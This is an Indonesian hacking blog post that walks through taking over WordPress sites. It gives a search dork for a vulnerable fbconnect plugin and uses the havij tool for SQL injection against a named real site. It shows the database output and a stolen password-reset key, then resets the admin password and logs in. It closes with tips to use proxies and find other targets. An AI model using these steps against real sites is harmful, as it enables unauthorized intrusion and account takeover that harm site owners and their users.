Hack Wordpress + havij only

Dork : inurl:"fbconnect_action=myhome" << bisa dikembangkan Tools : havij Exploit : Forgot Password http://site/wp-login.php?action=rp&key=QbiDH7xcZJT3d53XnKmB&login=admin disini saya akan memberi target... http://sinjai.linux.or.id/ http://sinjai.linux.or.id/?fbconnect_action=myhome&userid=2 ganti jadi http://sinjai.linux.or.id/?fbconnect_action=myhome&fbuserid=2<< Selected Column Count is 12 Valid String Column is 6 DB Server: MySQL Current DB: h80929_wp2 INGET 1 hal penting,,, http://site/wp-login.php?action=rp&key=QbiDH7xcZJT3d53XnKmB&login=admin site = http://sinjai.linux.or.id/ QbiDH7xcZJT3d53XnKmB = activation key admin = username http://sinjai.linux.or.id/wp-login.php klik lupa password atau tambahkan <> ?action=lostpassword
http://sinjai.linux.or.id/wp-login.php?action=lostpassword
masukan admin << sebagai username yang ada di table wp-user yang discan melalui havij...

kalau disini saya mendapatkan keynya YU4X3EwGEaHGueg2NA7S
cara mendapatkannya menggunakan havij masuk ke table wp-user
jadi dengan exploit forgot password
http://site/wp-login.php?action=rp&key=QbiDH7xcZJT3d53XnKmB&login=admin
kita kembangkan...
http://sinjai.linux.or.id/wp-login.php?action=rp&key=YU4X3EwGEaHGueg2NA7S&login=admin

dan masukan password baru kita..
dan akhirnya login...
http://sinjai.linux.or.id/wp-login.php
username : admin
password : sesuai yang sudah di reset

4.bp.blogspot.com/-jem6374j5vY/T0cvMT6XtmI/AAAAAAAAALA/-s0S0Hodunw/s1600/linux.or.id.jpg
atau ini
ketika direset akan tampil seperti ini
i1195.photobucket.com/albums/aa382/rizky1721/setelahdireset.jpg
dan akhirnya
i1195.photobucket.com/albums/aa382/rizky1721/bisakan.jpg

permasalan yang sering adalah tidak mereset password,
clear cookies, dan cari target lain..
jika ingin sukses ketika havij ingin scan, masukan proxy,,
proxy fresh bisa dari sini
http://www.ip-adr...roxy_list/

Credit : Aladin

3 comments:

Copyright © / X-code Security

Template by : Chunchun / powered by :X-c0de